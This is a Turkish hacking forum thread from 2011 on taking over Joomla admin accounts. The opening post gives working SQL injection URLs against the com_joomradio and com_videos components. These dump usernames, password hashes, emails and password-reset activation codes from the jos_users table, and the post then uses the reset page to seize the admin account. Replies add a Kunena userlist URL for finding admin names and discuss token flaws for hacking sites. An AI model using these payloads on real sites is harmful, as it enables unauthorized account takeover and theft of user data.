İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Joomla Sitelerde Admin şifresi Sıfırlama - MD5

29-08-2011 02:58
#1
!nFiNiTe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
Hell
Mesajlar:
5.918
Teşekkür (Etti):
158
Teşekkür (Aldı):
858
Konular:
4645
Ticaret:
(0) %
S.a Arklar Döküman Verildiyse Özür Dilerim..

Joomla sitelerin veritabanı mysql olduğu için user şifreleri md5 şeklinde kriptoludur. Kırılmayan bu admin şifrelerini sıfırlamaya yolunu bir arkadaştan buldum, burada paylaşmak istedim.

Kullanıcı adı ve Şifreleri bu şekilde öğreniriz.


Kod:
http://localhost/index.php?view=display&option=com_joomradio&id=1+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,password),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users
admin:d94236746886b37f57cba28145926c09

Ekrana bu şekilde bilgimiz geldi ve md5 çözülemiyor. Sırada admin mail adresini öğreniriz.

Kod:
http://localhost/index.php?view=display&option=com_joomradio&id=1+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,email),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users
admin:admin@mail.com

Ekranda admin in mail adresi de çıktı. şimdi aşağıdaki linke giriyoruz.

Kod:
http://localhost/index.php?option=com_user&view=reset
Şifre sıfırlama bölümünden maili yazıyoruz sonra aktivasyon kodu isteyecek şimdi maile yolladığı aktivasyon kodunu öğrenelim.

Kod:
http://localhost/index.php?view=display&option=com_videos&id=3+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,activation),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users
admin:aktivekodu aktivasyon kodunu böylece alıp şifreyi değiştirebiliriz artık.


Alıntı.
Kullanıcı İmzası

Yaşlandık Artık.
Konu !nFiNiTe tarafından (30-08-2011 17:40 Saat 17:40 ) değiştirilmiştir.
Margu, Darkness DeviL, KIRMIZI BEYAZ Teşekkür etti.

29-08-2011 10:07
#2
JersaW - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
Şehir diyomus venüs yazdm pardon ustaa :D
Mesajlar:
782
Teşekkür (Etti):
27
Teşekkür (Aldı):
355
Konular:
39
Ticaret:
(0) %
İnfinite konularını takip ediyorum çoğunlukla açıklayıcı bu benim işime yarar ama yeniler için karmaşık olmuş yinede emeğe saygı teşekkürler...
Kullanıcı İmzası
/
Konu !nFiNiTe tarafından (29-08-2011 14:10 Saat 14:10 ) değiştirilmiştir.
29-08-2011 14:11
#3
!nFiNiTe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
Hell
Mesajlar:
5.918
Teşekkür (Etti):
158
Teşekkür (Aldı):
858
Konular:
4645
Ticaret:
(0) %
Alıntı:
Undergod´isimli üyeden Alıntı Mesajı göster
İnfinite konularını takip ediyorum çoğunlukla açıklayıcı bu benim işime yarar ama yeniler için karmaşık olmuş yinede emeğe saygı teşekkürler...

Bu İşe girenler İçin En basit Yöntemler Bunu Anlamayanlar Hack Yapmasın Bence.
Kullanıcı İmzası

Yaşlandık Artık.
29-08-2011 15:13
#4
D0LCh - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2011
Nereden:
Gasseri
Mesajlar:
515
Teşekkür (Etti):
95
Teşekkür (Aldı):
79
Konular:
37
Ticaret:
(0) %
güzel paylaşım teşekürler
29-08-2011 23:37
#5
probilgi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2007
Mesajlar:
3
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
hiçbir işe yaramıyor 403 forbitten hatası veriyor. böyle bir açık yok !
29-08-2011 23:46
#6
Üyelik tarihi:
08/2009
Nereden:
TURAN
Yaş:
31
Mesajlar:
11.548
Teşekkür (Etti):
756
Teşekkür (Aldı):
2413
Konular:
5032
Ticaret:
(0) %
Harika olmus ortak.birkac deneme yaptıktan sonra yenılerde alısacaktır bu açıgı kullanmaya
30-08-2011 16:11
#7
SkyNet96 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2010
Nereden:
İzmir
Yaş:
28
Mesajlar:
128
Teşekkür (Etti):
11
Teşekkür (Aldı):
11
Konular:
24
Ticaret:
(0) %
Döküman Benden Alıntı Lütfen Belirt.
Kullanıcı İmzası
26-11-2011 18:35
#8
pcplator - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Mesajlar:
4
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
arkadasım yanlıs anlama ama sunu solıyım senın verdıgın

index.php?option=com_user&view=reset&layout=confir m

su reset kodu joomla 1.5.x hepsi icin gecerli email bölümünü atlasak bile mysql acıgı yoksa hacklemek istedigimiz sitede senin paylastıgın su kod ile :

index.php?view=display&option=com_videos&id=3+and+ 1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,activation),2,3,4,5,6 ,7,8,9,10/**/FROm/**/jos_users

adamın acıgını bulmus yanlız kapısında kalmıs gıbı oluruz. cunku token acıgı bulduk dıyelım admin kullanıcı ısmınıde su kodla eger forumu varsa joomlasında kurulu olan kunena olsa su sekılde bulduk desek:

/index.php?option=com_kunena&Itemid=0&func=userlist

admin kullanıcı ısmı bulundu sifre resetlemeyede acık token acıgıyla yanlız mysql acıgı yok ozaman napıcaz ?

bizden activasyon kodu istiyorsa ? bu acıgı kapatalı adamlar baya oldu tokenlı joomla busuru kullanan var ve karsısına bole bır sekılde cıkan bır sıte oldumu sıteyı ya pas gecer ya baska acıklar dener yada hackledıgı bır sıtenın serverında ıse yada şifresini cekmeye calısır :S

benım demek ıstedıgım bu kadar yolları asıp son cagre sıtede dedıgım gıbı olsa actıvasyon kodunu baska sekılde almanın bır yolu varmı? varsa tmm yoksa bedavaya ugrasıyoz bence
26-11-2011 22:31
#9
BluehackerTR - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Mesajlar:
207
Teşekkür (Etti):
38
Teşekkür (Aldı):
50
Konular:
38
Ticaret:
(0) %
Çok Teşekkür Ederim Kardeşim Ancak Biraz Aşağıya Bakarsan Ben Bunu Videolu Şekilde Paylasdım Yinede Çok Teşekkurler...

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı